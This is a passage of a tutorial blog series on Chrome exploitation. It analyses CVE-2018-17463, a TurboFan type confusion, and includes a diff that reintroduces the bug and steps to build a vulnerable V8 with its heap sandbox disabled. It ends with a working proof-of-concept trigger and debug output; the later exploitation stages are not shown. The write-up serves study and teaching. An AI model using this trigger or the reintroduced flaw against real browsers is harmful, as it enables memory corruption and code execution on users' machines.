  • Dead Code Elimination (DCE): Dead Code Elimination is exactly what it sounds like. It simply iterates through all the nodes and removes the code that won’t be executed. For example, if x and y in a True/False statement are always true, the false path will be considered “dead” and removed.

If you would like to learn more about the different optimizations and about the Sea of Nodes, I suggest reading “TurboFan JIT Design” and “Introduction to TurboFan”.
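A source-level picture can help with the last two items in the list above. The sketch below is plain JavaScript with hypothetical function names, and it assumes numeric input. Real compilers perform these transformations on the IR and not on the source, so treat it only as a before and after comparison.

```javascript
// Source-level picture of what GVN and DCE achieve. Function names are
// hypothetical and numeric input is assumed.

// Before: `x + 2` is computed twice and one path can never run.
function before(x) {
  const y = x + 2;
  const z = x + 2; // same value as y, so the computation is redundant
  if (true) {
    return y + z;
  }
  return -1; // dead: this line is never reached
}

// After: the duplicate computation and the dead path are gone.
function after(x) {
  const y = x + 2;
  return y + y;
}

console.log(before(5), after(5)); // 14 14
```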

Common JIT Compiler Vulnerabilities

With an understanding of the full V8 pipeline, and the compiler optimizations, we can now start looking at and understanding what type of vulnerability classes are present in browsers. As we know it, the JavaScript engine and all its components such as the compiler are all implemented in C++.

In that case the pipeline is first and foremost vulnerable to common memory and type safety violations, such as integer overflows and underflows, off-by-one errors, out-of-bound reads and writes, buffer overflows, heap overflows, and of course use-after-free bugs to name a few.

In addition to the usual C++ bugs, we also can have logic bugs and machine-code generation bugs that can occur during the optimization phase due to the nature of speculative assumptions. Such logic bugs can stem from the incorrect assumption of the potential side-effects an operation can have on an object or property or from improper optimization passes which remove critical type guards.

These types of issues are generally known as “type-confusion” vulnerabilities, where the compiler doesn’t verify the type or shape of the object that is passed to it, resulting in the compiler blindly using the object. This was the case in CVE-2018-17463, which we will attempt to analyze and exploit in Part 3 of this blog.

At this point of the blog, I considered diving into analyzing a few bugs and showing you examples of vulnerable code. In the end, I decided not to do that. Why? Well, at this point of the series you should have a good enough understanding of browser internals and V8 to be able to look through Chromium code and understand certain bug reports on your own.

So, here’s some homework for you, the reader. I will provide you with a list of videos and bug reports relating to browser exploitation. Take the time to read through some of these reports, and understand how these bugs came to be, and what allowed them to be exploited.

Do note that some of these bugs are in other JavaScript engines, but regardless, they give you a representation of the possible vulnerabilities that can arise in all JavaScript engines.

I recommend reading the following:

Closing

Well, that about does it for this post! Thanks for sticking around to the end and reading through all of this, as there was a lot of complex material that was covered. I can’t even count the number of times I had to go back and edit this initial draft of the blog post while learning all of this myself.

Hopefully a lot of the material that was presented here was easily understandable. And if it wasn’t, then again just as with my first post - take the time to read through this and utilize the links within the blog and references section to help you understand some of the concepts that are unclear.

Honestly, what helped me learn the most was reading through and debugging the V8 code. This gives you a much better idea of what happens under the hood and what is called where and when. This also helps you get more familiarized with the code if you’re trying to review it for bugs.

Anyway, with all the information that we covered here, the optimizations portion will be the most important for us in the next post. In part three of this blog post series, we’ll take everything we know to analyze and understand CVE-2018-17463. Afterwards, we’ll jump into understanding the basics around browser exploitation primitives, and then we’ll go through and actually exploit the bug to get remote code execution on the system.

With that being said, thanks for reading and I’ll see you in the next post!

Kudos

I would like to sincerely thank maxpl0it for doing a thorough technical review of this blog post, for providing critical feedback and adding in a few important details before its release.

I also want to thank Connor McGarr and V3ded for taking the time to proofread this post for accuracy and readability. Thank you for your time guys!

Finally, I want to give a shout out to Jeremy Fetiveau for his amazing work in the Chrome exploitation space, and for writing such detailed blog posts for Diary of a Reverse Engineer. These posts were immensely helpful in understanding a lot of the nuances in Chrome and V8.

References

Chrome Browser Exploitation, Part 3: Analyzing and Exploiting CVE-2018-17463

29 December 2022 at 00:00

Welcome to the third and final installment of the “Chrome Browser Exploitation” series. The main objective of this series has been to provide an introduction to browser internals and delve into the topic of Chrome browser exploitation on Windows in greater depth.

In Part 1 of the series, we examined the inner workings of JavaScript and V8. This included an exploration of objects, maps, and shapes, as well as an overview of memory optimization techniques such as pointer tagging and pointer compression.

In Part 2 of the series, we took a more in-depth look at the V8 compiler pipeline. We examined the role of Ignition, Sparkplug, and TurboFan in the pipeline and covered topics such as V8’s bytecode, code compilation, and code optimization.

In today’s blog post, we will be focusing on the analysis and exploitation of CVE-2018-17463, which was a JIT compiler vulnerability in TurboFan. This vulnerability arose from the improper side-effect modeling of the JSCreateObject operation during the lowering optimization phase. Before we delve into exploiting this bug, we will first learn about fundamental browser exploitation primitives, such as addrOf and fakeObj, and how we can use our bug to exploit type confusions.

Warning: Please be aware that this blog post is a detailed, in-depth read, as it goes through the exploitation process step by step. As such, it is a very heavy read. If you only want to read a specific part of the blog, there is a table of contents provided for your convenience.

The following topics will be discussed in this post:

  • Understanding Patch Gapping
  • Root Cause Analysis of CVE-2018-17463
  • Setting Up Our Environment
  • Generating a Proof of Concept
  • Exploiting a Type Confusion for JSCreateObject
  • Understanding Browser Exploit Primitives
    • The addrOf Read Primitive
    • The fakeObj Write Primitive
  • Gaining Memory Read + Write Access
  • Gaining Code Execution within V8
    • Basic WebAssembly Internals
    • Abusing WebAssembly Memory

Alright, with that being said, let’s jump in and do this!

Understanding Patch Gapping

In September 2018, Issue 888923 was reported to Google’s Security Team through Beyond Security’s SecuriTeam Secure Disclosure program. The bug was discovered by Samuel Gross through source code review and was used as part of the Hack2Win competition. A month after the bug was fixed, it was made public via an SSD Advisory titled “Chrome Type Confusion in JSCreateObject Operation to RCE”, which provided some details about the bug and released a detailed proof of concept for its exploitation.

Within the same month, Samuel gave a talk at BlackHat 2018 called “Attacking Client-Side JIT Compilers” in which he discussed vulnerabilities in JIT compilers, particularly those related to redundancy elimination and the modeling of side effects within IR. It wasn’t until 2021 that Samuel released a Phrack article titled “Exploiting Logic Bugs in JavaScript JIT Engines”, which provided a more in-depth explanation of how CVE-2018-17463 was discovered and exploited.

It’s worth noting that a significant amount of information about this bug was made public within a few weeks of its discovery. This means that attackers could have used this information to reverse engineer and exploit the bug. However, the issue with this is that most, if not all, Chrome browsers would have already been patched automatically within a few days or even weeks after the initial commit for the fix was pushed, rendering the bug useless.

Instead of relying on publicly available information about potential bugs, many attackers and exploit engineers track commits looking for specific keywords. When they find a commit that looks promising, they will try to figure out the underlying bug, a practice known as “patch gapping”.

In their post “Patch Gapping Google Chrome”, Exodus describe patch-gapping as “the practice of exploiting vulnerabilities in open-source software that are already fixed (or are in the process of being fixed) by the developers before the actual patch is shipped to users”.

Why is this relevant to our discussion of Chrome browser exploitation? Well, understanding the concept of patch gapping allows us to adopt more of an “adversary mindset.” After learning so much about the internals of V8, we now should have a good enough understanding to be able to spot a potential bug in Chrome’s code from an initial commit.

By taking this approach, we can widen the window of opportunity for exploiting a bug, as well as broaden our knowledge of Chrome’s codebase. Additionally, by observing locations in the code that are frequently patched, we can get a sense of where we should look for potential 0-day vulnerabilities in Chrome.

With that in mind, let’s begin our root cause analysis by looking at the initial commit that was pushed to fix the bug we’re examining. We’ll try to reverse engineer the fix and figure out how to trigger the bug using the knowledge we acquired. If we get stuck, we’ll use the already existing public resources to help us. After all, this is a journey through browser exploitation, and a journey is not always an easy one!

Root Cause Analysis of CVE-2018-17463

Looking into Issue 888923, we can see that the initial patch for this bug was pushed with commit 52a9e67a477bdb67ca893c25c145ef5191976220 with the message of “[turbofan] Fix ObjectCreate’s side effect annotation”. Knowing this, let’s use the git show command within our V8 directory to see what that commit fixed.

C:\dev\v8\v8>git show 52a9e67a477bdb67ca893c25c145ef5191976220
commit 52a9e67a477bdb67ca893c25c145ef5191976220
Author: Jaroslav Sevcik <[email protected]>
Date:   Wed Sep 26 13:23:47 2018 +0200

    [turbofan] Fix ObjectCreate's side effect annotation.

    Bug: chromium:888923
    Change-Id: Ifb22cd9b34f53de3cf6e47cd92f3c0abeb10ac79
    Reviewed-on: https://chromium-review.googlesource.com/1245763
    Reviewed-by: Benedikt Meurer <[email protected]>
    Commit-Queue: Jaroslav Sevcik <[email protected]>
    Cr-Commit-Position: refs/heads/master@{#56236}

diff --git a/src/compiler/js-operator.cc b/src/compiler/js-operator.cc
index 94b018c987..5ed3f74e07 100644
--- a/src/compiler/js-operator.cc
+++ b/src/compiler/js-operator.cc
@@ -622,7 +622,7 @@ CompareOperationHint CompareOperationHintOf(const Operator* op) {
   V(CreateKeyValueArray, Operator::kEliminatable, 2, 1)                \
   V(CreatePromise, Operator::kEliminatable, 0, 1)                      \
   V(CreateTypedArray, Operator::kNoProperties, 5, 1)                   \
-  V(CreateObject, Operator::kNoWrite, 1, 1)                            \
+  V(CreateObject, Operator::kNoProperties, 1, 1)                       \
   V(ObjectIsArray, Operator::kNoProperties, 1, 1)                      \
   V(HasProperty, Operator::kNoProperties, 2, 1)                        \
   V(HasInPrototypeChain, Operator::kNoProperties, 2, 1)                \
diff --git a/test/mjsunit/compiler/regress-888923.js b/test/mjsunit/compiler/regress-888923.js
new file mode 100644
index 0000000000..e352673b7d
--- /dev/null
+++ b/test/mjsunit/compiler/regress-888923.js
@@ -0,0 +1,31 @@
+// Copyright 2018 the V8 project authors. All rights reserved.
+// Use of this source code is governed by a BSD-style license that can be
+// found in the LICENSE file.
+
+// Flags: --allow-natives-syntax
+
+(function() {
+  function f(o) {
+    o.x;
+    Object.create(o);
+    return o.y.a;
+  }
+
+  f({ x : 0, y : { a : 1 } });
+  f({ x : 0, y : { a : 2 } });
+  %OptimizeFunctionOnNextCall(f);
+  assertEquals(3, f({ x : 0, y : { a : 3 } }));
+})();
+
+(function() {
+  function f(o) {
+    let a = o.y;
+    Object.create(o);
+    return o.x + a;
+  }
+
+  f({ x : 42, y : 21 });
+  f({ x : 42, y : 21 });
+  %OptimizeFunctionOnNextCall(f);
+  assertEquals(63, f({ x : 42, y : 21 }));
+})();

Upon examining this commit, we can see that it only fixed a single line of code in the src/compiler/js-operator.cc file. The fix simply replaced the Operator::kNoWrite flag with the Operator::kNoProperties flag for the CreateObject JavaScript operation.

If you remember back in Part 2 of this series, we briefly discussed these flags and explained that they are used by intermediate representation (IR) operations. In this case, the kNoWrite flag indicates that the CreateObject operation will not have observable side effects, or in other words, observable changes to the execution of the context.

This poses a problem for the compiler. As we know, certain operations can have side effects that cause observable changes to the context. For example, if an object that was passed in had its Map changed or modified - that’s an observable side effect that needs to be written to the chain of operations. Otherwise, certain optimization passes, such as redundancy elimination, may remove what the compiler believes is a “redundant” CheckMaps operation when in reality it was a required check. Essentially, this can lead to a type confusion vulnerability.

So let’s validate whether the CreateObject function does in fact have an observable side-effect.

To determine whether an IR operation has side effects, we need to look at the lowering phase of the optimizing compiler. This phase converts high-level IR operations into lower-level instructions for JIT compilation and is also where redundancy elimination occurs.

For the CreateObject JavaScript operation, the lowering happens within the v8/src/compiler/js-generic-lowering.cc source file, specifically within the LowerJSCreateObject function.

void JSGenericLowering::LowerJSCreateObject(Node* node) {
  CallDescriptor::Flags flags = FrameStateFlagForCall(node);
  Callable callable = Builtins::CallableFor(
      isolate(), Builtins::kCreateObjectWithoutProperties);
  ReplaceWithStubCall(node, callable, flags);
}

Looking at the lowering function, we can see that the JSCreateObject IR operation will be lowered to a call to the builtin function CreateObjectWithoutProperties, located within the v8/src/builtins/object.tq source file.

transitioning builtin CreateObjectWithoutProperties(implicit context: Context)(
    prototype: JSAny): JSAny {
  try {
    let map: Map;
    let properties: NameDictionary|SwissNameDictionary|EmptyFixedArray;
    typeswitch (prototype) {
      case (Null): {
        map = *NativeContextSlot(
            ContextSlot::SLOW_OBJECT_WITH_NULL_PROTOTYPE_MAP);
        @if(V8_ENABLE_SWISS_NAME_DICTIONARY) {
          properties =
              AllocateSwissNameDictionary(kSwissNameDictionaryInitialCapacity);
        }
        @ifnot(V8_ENABLE_SWISS_NAME_DICTIONARY) {
          properties = AllocateNameDictionary(kNameDictionaryInitialCapacity);
        }
      }
      case (prototype: JSReceiver): {
        properties = kEmptyFixedArray;
        const objectFunction =
            *NativeContextSlot(ContextSlot::OBJECT_FUNCTION_INDEX);
        map = UnsafeCast<Map>(objectFunction.prototype_or_initial_map);
        if (prototype != map.prototype) {
          const prototypeInfo = prototype.map.PrototypeInfo() otherwise Runtime;
          typeswitch (prototypeInfo.object_create_map) {
            case (Undefined): {
              goto Runtime;
            }
            case (weak_map: Weak<Map>): {
              map = WeakToStrong(weak_map) otherwise Runtime;
            }
          }
        }
      }
      case (JSAny): {
        goto Runtime;
      }
    }
    return AllocateJSObjectFromMap(map, properties);
  } label Runtime deferred {
    return runtime::ObjectCreate(prototype, Undefined);
  }
}

There’s a lot of code within this function. We don’t need to understand it all, but put simply, this function begins the process of creating a new object without properties. One interesting aspect of this function is the typeswitch on the object’s prototype.

The reason this is interesting for us is because of an optimization trick within V8. In JavaScript, each object has a private property that holds a link to another object called its prototype. In simple terms, a prototype is similar to a class in C++, where objects can inherit features from certain classes. That prototype object has its own prototype, and so does the prototype of the prototype, forming a “prototype chain” that continues until an object whose prototype is null is reached.

I won’t go into too much detail on prototypes in this post, but you can read “Object Prototypes” and “Inheritance and the Prototype Chain” for a better understanding of this concept. For now, let’s focus on the interesting optimization of prototypes in V8.
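As a quick refresher, the sketch below walks a prototype chain by hand using only standard JavaScript. The helper name prototypeChain and the sample objects are made up for this example.

```javascript
// Collect every object on the prototype chain of `obj`, stopping at null.
function prototypeChain(obj) {
  const chain = [];
  let current = Object.getPrototypeOf(obj);
  while (current !== null) {
    chain.push(current);
    current = Object.getPrototypeOf(current);
  }
  return chain;
}

const base = { greet() { return "hello"; } };
const derived = Object.create(base); // base becomes derived's prototype

const chain = prototypeChain(derived);
console.log(chain.length);                  // 2: base, then Object.prototype
console.log(chain[0] === base);             // true
console.log(chain[1] === Object.prototype); // true
console.log(derived.greet());               // "hello", found through the chain
```

Note that Object.create is exactly the call that turns base into a prototype here, which is why it matters for the rest of this section.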

In V8, each prototype has a unique shape that is not shared with any other objects, specifically not with other prototypes. Whenever the prototype of an object is changed, a new shape is allocated for that prototype. I suggest reading “JavaScript Engine Fundamentals: Optimizing Prototypes” for more information on this optimization.

Because of this, we want to pay close attention to this code: optimizing an object as a prototype is a side effect that could have consequences if not properly modeled.

In the end, the CreateObjectWithoutProperties function falls back to the ObjectCreate function through its Runtime label, which is a C++ runtime builtin located in v8/src/objects/js-objects.cc. Back in the 2018 codebase, this function was located within the v8/src/objects.cc file.

// 9.1.12 ObjectCreate ( proto [ , internalSlotsList ] )
// Notice: This is NOT 19.1.2.2 Object.create ( O, Properties )
MaybeHandle<JSObject> JSObject::ObjectCreate(Isolate* isolate,
                                             Handle<Object> prototype) {
  // Generate the map with the specified {prototype} based on the Object
  // function's initial map from the current native context.
  // TODO(bmeurer): Use a dedicated cache for Object.create; think about
  // slack tracking for Object.create.
  Handle<Map> map =
      Map::GetObjectCreateMap(isolate, Handle<HeapObject>::cast(prototype));

  // Actually allocate the object.
  return isolate->factory()->NewFastOrSlowJSObjectFromMap(map);
}

Peeking into the ObjectCreate function, we can see that it generates a new map for the object based on the prototype we passed in, using the GetObjectCreateMap function, which is located in v8/src/objects/map.cc.

At this point we should already start seeing where the potential side-effects are within this JavaScript operator.

// static
Handle<Map> Map::GetObjectCreateMap(Isolate* isolate,
                                    Handle<HeapObject> prototype) {
  Handle<Map> map(isolate->native_context()->object_function().initial_map(),
                  isolate);
  if (map->prototype() == *prototype) return map;
  if (prototype->IsNull(isolate)) {
    return isolate->slow_object_with_null_prototype_map();
  }
  if (prototype->IsJSObject()) {
    Handle<JSObject> js_prototype = Handle<JSObject>::cast(prototype);
    if (!js_prototype->map().is_prototype_map()) {
      JSObject::OptimizeAsPrototype(js_prototype); // <== Side Effect
    }
    Handle<PrototypeInfo> info =
        Map::GetOrCreatePrototypeInfo(js_prototype, isolate);
    // TODO(verwaest): Use inobject slack tracking for this map.
    if (info->HasObjectCreateMap()) {
      map = handle(info->ObjectCreateMap(), isolate);
    } else {
      map = Map::CopyInitialMap(isolate, map);
      Map::SetPrototype(isolate, map, prototype);
      PrototypeInfo::SetObjectCreateMap(info, map);
    }
    return map;
  }

  return Map::TransitionToPrototype(isolate, map, prototype); // <== Side Effect
}

Within the GetObjectCreateMap function, we can see two interesting calls, to JSObject::OptimizeAsPrototype and Map::TransitionToPrototype. This is interesting for us because this code implies and further confirms that the object passed in as the prototype is converted to a prototype object, which also changes that object’s associated map.
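The control flow above can be sketched as a rough JavaScript model. Everything in it (toyObject, optimizeAsPrototype, getObjectCreateMap, and the shape of the map objects) is a hypothetical stand-in rather than V8 code, and modeling the swapped map as a dictionary-mode map is an assumption of the sketch. It only covers the JSObject branch.

```javascript
// Rough JavaScript model of the JSObject branch of Map::GetObjectCreateMap.
// All names and object shapes here are hypothetical stand-ins, not V8 code.
const initialMap = { kind: "fast", prototype: Object.prototype, isPrototypeMap: false };

function toyObject() {
  return {
    map: { kind: "fast", prototype: Object.prototype, isPrototypeMap: false },
    prototypeInfo: null,
  };
}

function optimizeAsPrototype(obj) {
  // Side effect: the object passed in receives a brand new map.
  // Assumption: the new map is modeled as a dictionary-mode map.
  obj.map = { kind: "dictionary", prototype: obj.map.prototype, isPrototypeMap: true };
}

function getObjectCreateMap(proto) {
  if (!proto.map.isPrototypeMap) optimizeAsPrototype(proto);
  if (proto.prototypeInfo === null) proto.prototypeInfo = { objectCreateMap: null };
  const info = proto.prototypeInfo;
  if (info.objectCreateMap === null) {
    // Copy the initial map, point it at the prototype, and cache it.
    info.objectCreateMap = { ...initialMap, prototype: proto };
  }
  return info.objectCreateMap;
}

const proto = toyObject();
const mapBefore = proto.map;
const first = getObjectCreateMap(proto);
const second = getObjectCreateMap(proto);
console.log(proto.map !== mapBefore); // true: the argument itself was modified
console.log(proto.map.kind);          // "dictionary"
console.log(first === second);        // true: the created map is cached
```

The point of the model is that the function does not just compute a map for the new object; it also mutates the object it was handed.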

Knowing this, let’s jump into d8 and validate that the Object.create function does indeed modify an object and its map in a way that is exploitable for us. To start, let’s launch d8 with the --allow-natives-syntax option and create a new object, like so.

let obj = {x:13};

From here, let’s execute the %DebugPrint function against our object to see its map and associated properties.

d8> %DebugPrint(obj)
DebugPrint: 000002A50010A505: [JS_OBJECT_TYPE]
 - map: 0x02a5002596f5 <Map[16](HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x02a500244669 <Object map = 000002A500243D25>
 - elements: 0x02a500002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x02a500002259 <FixedArray[0]>
 - All own properties (excluding elements): {
    000002A5000041ED: [String] in ReadOnlySpace: #x: 13 (const data field 0), location: in-object
 }
000002A5002596F5: [Map] in OldSpace
 - type: JS_OBJECT_TYPE
 - instance size: 16
 - inobject properties: 1
 - elements kind: HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x02a5002596cd <Map[16](HOLEY_ELEMENTS)>
 - prototype_validity cell: 0x02a5002043cd <Cell value= 1>
 - instance descriptors (own) #1: 0x02a50010a515 <DescriptorArray[1]>
 - prototype: 0x02a500244669 <Object map = 000002A500243D25>
 - constructor: 0x02a50024422d <JSFunction Object (sfi = 000002A50021BA25)>
 - dependent code: 0x02a5000021e1 <Other heap object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

From an initial review of the output, we can see that the object has a FastProperties map, which corresponds to our object having in-object properties. Now, let’s execute the Object.create function against our object, and print out its debug information.

d8> Object.create(obj)
d8> %DebugPrint(obj)
DebugPrint: 000002A50010A505: [JS_OBJECT_TYPE]
 - map: 0x02a50025a9c9 <Map[16](HOLEY_ELEMENTS)> [DictionaryProperties]
 - prototype: 0x02a500244669 <Object map = 000002A500243D25>
 - elements: 0x02a500002259 <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x02a50010c339 <NameDictionary[17]>
 - All own properties (excluding elements): {
   x: 13 (data, dict_index: 1, attrs: [WEC])
 }
000002A50025A9C9: [Map] in OldSpace
 - type: JS_OBJECT_TYPE
 - instance size: 16
 - inobject properties: 1
 - elements kind: HOLEY_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - dictionary_map
 - may_have_interesting_symbols
 - prototype_map
 - prototype info: 0x02a50025a9f1 <PrototypeInfo>
 - prototype_validity cell: 0x02a5002043cd <Cell value= 1>
 - instance descriptors (own) #0: 0x02a5000021ed <Other heap object (STRONG_DESCRIPTOR_ARRAY_TYPE)>
 - prototype: 0x02a500244669 <Object map = 000002A500243D25>
 - constructor: 0x02a50024422d <JSFunction Object (sfi = 000002A50021BA25)>
 - dependent code: 0x02a5000021e1 <Other heap object (WEAK_ARRAY_LIST_TYPE)>
 - construction counter: 0

As you can see, when Object.create is called, the map of the object is changed from a FastProperties map with in-object properties to a DictionaryProperties map where these properties are now stored in a dictionary. This side effect invalidates the kNoWrite flag for the CreateObject intermediate representation (IR) operation, proving that this assumption is flawed.

In this case, if we can get the CheckMap operation that follows the call to Object.create to be removed through redundancy elimination, then we can trigger a type confusion vulnerability. The type confusion will occur when the engine tries to access the out-of-line properties within the properties backing store. The engine expects the properties backing store to be a FixedArray where each property is stored one after another, but instead it will now point to a more complex NameDictionary.

Setting Up Our Environment

Before we can move on to analyzing and exploiting this bug, we first need to set up our development environment. If you have been following this blog post series since Part 1, you likely already have a working version of d8 after following the instructions in my “Building Chrome V8 on Windows” guide.

Since this bug is from 2018, there have been a lot of changes to the Chromium codebase along with changes to the dependencies required to build newer versions. To reproduce this bug you can simply apply the below diff patch to the src/compiler/js-operator.cc file:

diff --git a/src/compiler/js-operator.cc b/src/compiler/js-operator.cc
index 8af8e7d32f..63edfa9684 100644
--- a/src/compiler/js-operator.cc
+++ b/src/compiler/js-operator.cc
@@ -750,7 +750,7 @@ Type JSWasmCallNode::TypeForWasmReturnType(const wasm::ValueType& type) {
   V(CreateKeyValueArray, Operator::kEliminatable, 2, 1)                  \
   V(CreatePromise, Operator::kEliminatable, 0, 1)                        \
   V(CreateTypedArray, Operator::kNoProperties, 5, 1)                     \
-  V(CreateObject, Operator::kNoProperties, 1, 1)                         \
+  V(CreateObject, Operator::kNoWrite, 1, 1)                              \
   V(ObjectIsArray, Operator::kNoProperties, 1, 1)                        \
   V(HasInPrototypeChain, Operator::kNoProperties, 2, 1)                  \
   V(OrdinaryHasInstance, Operator::kNoProperties, 2, 1)                  \

However, during my testing, while I was able to trigger the bug, I was not able to actually get a working type confusion and abuse the addrOf and fakeObj primitives (which we will discuss later in the post). I am not sure why this was the case, but it could be that a code change between 2018 and 2022 patched part of the codebase that was required for these primitives.

UPDATE: The reason that this type confusion wasn’t working on newer versions of V8 after the diff patch was that the V8 Heap Sandbox was enabled. This sandbox essentially prevents an attacker from corrupting V8 objects such as the ArrayBuffer.

After applying the patch, it may be possible to disable the V8 Heap Sandbox by setting the V8_VIRTUAL_MEMORY_CAGE flag, which was introduced in Change 3010195, to False. I haven’t tested this personally, so I can’t guarantee this will work.

UPDATE 2: If you want to apply this patch to newer versions of V8 and follow along, you can modify the BUILD.gn file and set v8_enable_sandbox, v8_enable_pointer_compression, and v8_enable_pointer_compression_shared_cage to false. Afterwards, you should be able to rebuild V8 by following the original build instructions.

Instead, what I opted to do was to check out the last “vulnerable” commit before the bug fix and build v8 and d8 again. This itself posed some problems, as in 2018 Chrome required Visual Studio 2017, but in our current environment we have Visual Studio 2019. While it is still possible to build Chrome with Visual Studio 2019, we need to install some prerequisites first.

To start, open Visual Studio 2019 Installer, and install the following additional components:

  • MSVC v140 - VS 2015 C++ build tools (v14.00)
  • MSVC v141 - VS 2017 C++ x64/x86 build tools (v14.16)
  • Windows 10 SDK (10.0.17134.0)

Once those components are installed, we need to add the following environment variables:

  • Add the vs2017_install User Variable and set it to C:\Program Files (x86)\Microsoft Visual Studio 14.0\
  • Add C:\Program Files (x86)\Windows Kits\10\bin\10.0.17134.0\x64 to the User Path Variable.

Once that’s configured, we now need to modify the V8 codebase. If we look into the git log of commit 52a9e67a477bdb67ca893c25c145ef5191976220, we’ll see that the last vulnerable commit before the bug fix was 568979f4d891bafec875fab20f608ff9392f4f29.

With that commit in hand, we can run the git checkout command to update the files in the V8 directory and match the version of the last vulnerable commit.

C:\dev\v8\v8>git checkout 568979f4d891bafec875fab20f608ff9392f4f29
HEAD is now at 568979f4d8 [parser] Fix memory accounting of explicitly cleared zones

After setting that up, delete the x64.debug directory in the v8\v8\out\ folder to avoid errors. Next, modify the build/toolchain/win/tool_wrapper.py build script so that it matches the version of tool_wrapper.py from after the superflush hack was removed. Without that fix, the build fails with the error reported in Issue 1033106.

Once you have modified the tool_wrapper.py file, you can build the debug version of d8 with the following commands:

C:\dev\v8\v8>gn gen --ide=vs out\x64.debug
C:\dev\v8\v8>cd out\x64.debug
C:\dev\v8\v8\out\x64.debug>msbuild all.sln

This build may take a while to complete, so go get a coffee while you wait. ☕

Once the build is completed, you should be able to launch d8 and successfully run the poc.js script from the SSD Advisory to confirm that you can create a working read/write primitive.

Generating a Proof of Concept

Now that we have a vulnerable version of V8 and understand the underlying bug, we can start writing our proof of concept. Let’s start by recapping what we need this proof of concept to do:

  1. Create a new object with an inline property that will be used as our prototype for Object.create.
  2. Add a new out-of-line property to the object’s property backing store, which we will attempt to access after the Map transition.
  3. Force a CheckMap operation on the object to trigger redundancy elimination, which will remove subsequent CheckMap operations.
  4. Call Object.create with the previously created object to force a Map transition.
  5. Access the out-of-line property of our object.
    • Due to the CheckMap redundancy elimination, the engine will dereference the property pointer thinking it’s an array. However, it now points to a NameDictionary, allowing us to access different data.

On the surface, this may seem straightforward. However, it’s important to note that bugs can often be more complex in practice than in theory, particularly when it comes to triggering or exploiting them. Therefore, the hardest part is usually triggering the bug and getting a type confusion to work. Once that is achieved, the process toward exploitation tends to be smoother.

So, how do we begin?

Fortunately for us, if we examine the diff for 52a9e67a477bdb67ca893c25c145ef5191976220, we will notice that the Chrome team added a regression test case in the commit. A regression test is used to verify that any updates or modifications to an application do not affect its overall functionality. In this case, the regression file appears to be testing for our bug!

Let’s take a look at this test case and see what we can work with.

// Flags: --allow-natives-syntax

(function() {
  function f(o) {
    o.x;
    Object.create(o);
    return o.y.a;
  }

  f({ x : 0, y : { a : 1 } });
  f({ x : 0, y : { a : 2 } });
  %OptimizeFunctionOnNextCall(f);
  assertEquals(3, f({ x : 0, y : { a : 3 } }));
})();

From the top of the code, we can see that a new function f is created which accepts an object o. When this function is called, it performs the following actions on the passed-in object:

  1. It accesses property x of object o, which should force a CheckMap operation.
  2. It calls Object.create on object o, which should force a Map transition.
  3. It accesses property a of the object y stored in o (o.y.a), which should trigger the type confusion.

We can see that this function is called twice with simple objects and properties, and then %OptimizeFunctionOnNextCall is called, which forces V8 to pass the function to TurboFan for optimization. This saves us from needing to run a loop to make the function “hot”. The function is then called a third time, which should trigger our bug.

As you can see, assertEquals is called to check that the value of 3 is returned. If it is not, it’s possible that the bug is still present.
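If you want to run the same check in an engine where the natives syntax is not available, a warm-up loop can stand in for %OptimizeFunctionOnNextCall. The sketch below is a natives-free variant of the regression test, not the test from the commit. The helper countMismatches and the iteration count of 20000 are assumptions, and whether the loop actually reaches the optimizing compiler depends on the engine’s heuristics.

```javascript
// Natives-free variant of the regression test: a warm-up loop replaces
// %OptimizeFunctionOnNextCall, so this runs in any JavaScript engine.
function f(o) {
  o.x;              // property load that needs a map check
  Object.create(o); // may change o's map as a side effect
  return o.y.a;     // must still observe the real value
}

// Hypothetical helper: counts how often f returns something unexpected.
function countMismatches(iterations) {
  let mismatches = 0;
  for (let i = 0; i < iterations; i++) {
    if (f({ x: 0, y: { a: i } }) !== i) mismatches++;
  }
  return mismatches;
}

const mismatches = countMismatches(20000);
console.log(mismatches); // 0 on an engine that models the side effect correctly
```

On a fixed engine the count stays at zero. On a vulnerable build, a non-zero count would indicate that the optimized code read the wrong data.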

This is helpful for us because we now have a working proof of concept that we can use. Although, I’m not sure why they are using an object within the properties backing store instead of a value. Guess we’ll figure that out later.

With this information, let’s build our own proof of concept script by using the information we have gathered. Afterwards, we’ll perform a few checks to make sure that we indeed have a working type confusion, and we’ll also use Turbolizer to validate that the CheckMap operation is indeed removed via redundancy elimination.

Our proof of concept should look like so:

function vuln(obj) {
    // Access Property a of obj, forcing a CheckMap operation
    obj.a;

    // Force a Map Transition via our side-effect
    Object.create(obj)

    // Trigger our type-confusion by accessing an out-of-bound property
    return obj.b;
}

vuln({a:42, b:43}); // Warm-up code
vuln({a:42, b:43});
%OptimizeFunctionOnNextCall(vuln); // JIT Compile vuln
vuln({a:42, b:43}); // Trigger type-confusion - should not return 43!

Now that we have created our proof of concept, let’s start d8 with the --allow-natives-syntax flag and add in our vuln function. Once the function is created, let’s execute the last 4 lines of code within our proof of concept. You should see the following output:

d8> vuln({a:42, b:43})
43
d8> vuln({a:42, b:43})
43
d8> %OptimizeFunctionOnNextCall(vuln)
undefined
d8> vuln({a:42, b:43})
0

And with that, we have a working proof of concept! As you can see, the optimized function no longer returns 43, but returns 0 instead.

Before we delve further into the bug and try to achieve a working type confusion, let’s run this script with the --trace-turbo flag and inspect the IR at each optimization stage to confirm that the CheckMap node has indeed been removed and that this is not a fluke.

C:\dev\v8\v8\out\x64.debug>d8 --allow-natives-syntax --trace-turbo poc.js
Concurrent recompilation has been disabled for tracing.
---------------------------------------------------
Begin compiling method vuln using Turbofan
---------------------------------------------------
Finished compiling method vuln using Turbofan

Once the turbo file has been created, let’s examine the Typer optimization phase to see the initial IR graph.

Initial review of the IR shows us what we expected. As you can see, the Parameter[1] node passes in the object for our function. This object goes through a CheckMaps operation to validate the map, and then a LoadField operation is called to return property a.

Next, we call JSCreateObject to modify our object into a prototype. Afterwards the IR goes through a CheckMaps operation to validate the Map of the object and then calls the LoadField operation to return property b. This is the expected side-effect flow that should have been preserved.

Now, let’s take a look at the IR after the lowering phase. Since CreateObject does not write to the side-effect chain, the CheckMaps node should no longer exist due to redundancy elimination.

As you can see in the simplified lowering phase, our previous CheckMaps node after the JSCreateObject call has now been removed and it directly calls the LoadField node.

